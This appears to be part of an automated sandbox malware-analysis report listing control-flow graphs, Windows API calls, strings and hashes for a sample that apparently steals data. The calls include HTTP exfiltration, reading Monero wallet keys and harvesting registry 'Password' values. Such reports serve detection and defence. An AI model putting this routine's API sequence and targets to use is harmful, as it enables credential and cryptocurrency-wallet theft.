                                                                                                                                                                                                                                              control_flow_graph 1666 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1681 404604 1666->1681 1682 40460b-40460f 1666->1682 1681->1682 1683 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1682->1683 1684 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1682->1684 1683->1684 1770 404793-404797 1683->1770 1694 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1684->1694 1695 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1684->1695 1695->1694 1771 4047a5 1770->1771 1772 404799-4047a3 1770->1772 1773 4047af-4047e2 HttpOpenRequestA 1771->1773 1772->1773 1774 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1773->1774 1775 404b7e-404b85 InternetCloseHandle 1773->1775 1886 404af2-404b1c InternetReadFile 1774->1886 1775->1684 1887 404b27-404b79 InternetCloseHandle call 416e00 1886->1887 1888 404b1e-404b25 1886->1888 1887->1775 1888->1887 1890 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1888->1890 1890->1886
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,04083B38), ref: 004045FA
                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04083A78), ref: 00404AA8
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,04083B18,?,040874C8,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                              • String ID: "$"$------$------$------$J&f
                                                                                                                                                                                                                                              • API String ID: 460715078-2398766951
                                                                                                                                                                                                                                              • Opcode ID: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
                                                                                                                                                                                                                                              • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,0406C1E0,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                                                              • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                                              • Opcode ID: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
                                                                                                                                                                                                                                              • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                                              • Opcode ID: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
                                                                                                                                                                                                                                              • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                                • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                              • API String ID: 2054947926-218353709
                                                                                                                                                                                                                                              • Opcode ID: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
                                                                                                                                                                                                                                              • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(36BF7020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(36BF7020,00000000), ref: 00407018
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(36BF7020, : ), ref: 0040702A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(36BF7020,00000000), ref: 0040705F
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(36BF7020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(36BF7020,00000000), ref: 004070A3
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(36BF7020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                              • String ID: : $`v@$h0A
                                                                                                                                                                                                                                              • API String ID: 3191641157-3559972273
                                                                                                                                                                                                                                              • Opcode ID: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
                                                                                                                                                                                                                                              • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                                              • API String ID: 0-3785015651
                                                                                                                                                                                                                                              • Opcode ID: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
                                                                                                                                                                                                                                              • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                                              • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                              • String ID: c.A$c.A
                                                                                                                                                                                                                                              • API String ID: 3066467675-270182787
                                                                                                                                                                                                                                              • Opcode ID: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
                                                                                                                                                                                                                                              • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                              • String ID: Password
                                                                                                                                                                                                                                              • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                                              • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                              • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
